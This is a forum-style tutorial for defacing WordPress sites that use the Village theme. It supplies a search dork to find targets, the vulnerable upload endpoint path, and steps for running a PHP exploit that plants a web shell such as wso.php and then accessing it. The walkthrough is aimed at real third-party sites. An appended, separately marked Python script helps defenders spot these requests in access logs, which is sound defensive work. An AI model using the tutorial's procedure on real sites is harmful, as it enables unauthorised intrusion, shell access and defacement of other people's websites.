Okay guys, this time I'm going to share a deface using the WordPress Village theme. Let's get straight to it without too much talk :v Sorry if I get anything wrong :D
Materials:
▐ Dork: inurl:/wp-content/themes/village/ use your brain
▐ Xampp
▐ Shell
▐ Exploit
Download XAMPP first and install it right away once that's done. Copy the exploit into Notepad and save it with the ".php" extension, for example village.php, in the folder "C:\xampp\php". Don't forget to put the shell in the "C:\xampp\php" folder as well, so the shell and the exploit are both in the php folder.
Now go look for a target :v using the dork above. Once you've found one, put this exploit path at the end of its URL:
/wp-content/themes/village/blueprint/gallery/ajaxupload/server/php.php so it becomes http://localhost/wp-content/themes/village/blueprint/gallery/ajaxupload/server/php.php
If it's vulnerable, you'll see the text {"error":"No files were uploaded."}.
Open the exploit PHP file from earlier. At ...http://localhost/wp-content/... replace localhost with your target. At the top there is the code $uploadfile="wso.php"; wso.php is the name of my shell. If you use another shell such as b374k, 1n7ection, andela or something else, change it, for example $uploadfile="1n7ection.php"; then save it again.
Open Cmd and type "cd C:\xampp\php", press Enter, then type "php namaexploit.php" [without the quotes] and press Enter. If it works, the response is {"success":true}
Then just access the shell:
http://localhost/wp-content/themes/village/blueprint/gallery/ajaxupload/server/uploads/namashell.php
Got it now, right? :v If you don't understand, don't be shy about asking me.
That's all for my tutorial :D
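For defenders, the requests this procedure leaves in a web server access log can be triaged as follows. This is an added example, not part of the original post: the combined log format, the treatment of POST as the upload attempt, the extension list and the sample lines are assumptions or constructed; only the two paths come from the post.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# The two paths come from the post; everything else is an assumption of this example.
BASE = "/wp-content/themes/village/blueprint/gallery/ajaxupload/server/"
UPLOADER = BASE + "php.php"
UPLOAD_DIR = BASE + "uploads/"
# Extensions a PHP-enabled server may execute (assumed; match your handler config).
EXEC_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.I)
# Apache/nginx "combined" access-log format (assumed).
LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                  r'"(?P<method>[A-Z]+) (?P<uri>\S+)[^"]*" (?P<status>\d{3}) ')
REVIEW = {"upload", "upload_failed", "script_blocked"}

def classify(line):
    """Return (client_ip, event) for a relevant log line, else None."""
    m = LINE.match(line)
    if not m:
        return None
    # Normalise so "//" or percent-encoding in the path does not hide a match.
    path = re.sub(r"/+", "/", unquote(m["uri"].split("?", 1)[0]))
    ok = m["status"].startswith("2")
    if path == UPLOADER:
        # Assumption: uploads arrive as POST; any other method is only a probe.
        if m["method"] == "POST":
            return m["ip"], "upload" if ok else "upload_failed"
        return m["ip"], "probe"
    if path.startswith(UPLOAD_DIR) and EXEC_EXT.search(path):
        return m["ip"], "script_hit" if ok else "script_blocked"
    return None

def triage(lines):
    """Rank each client: likely-compromised > needs-review > probed."""
    seen = defaultdict(set)
    for ip, event in filter(None, map(classify, lines)):
        seen[ip].add(event)
    return {ip: "likely-compromised" if "script_hit" in ev
            else "needs-review" if ev & REVIEW else "probed"
            for ip, ev in seen.items()}

# Constructed sample lines (documentation IP ranges), not real traffic.
FMT = '{} - - [10/Mar/2024:10:00:00 +0000] "{} {} HTTP/1.1" {} 38 "-" "-"'
SAMPLE = [
    FMT.format("198.51.100.7", "GET", UPLOADER, 200),
    FMT.format("203.0.113.9", "POST", UPLOADER, 200),
    FMT.format("203.0.113.9", "GET", UPLOAD_DIR + "x.php", 200),
    FMT.format("192.0.2.44", "GET", UPLOAD_DIR + "x.php", 403),
]
```

A 2xx response for a script under the uploads directory means the server executed or served it, so that host should be treated as compromised even when the upload itself came from a different address.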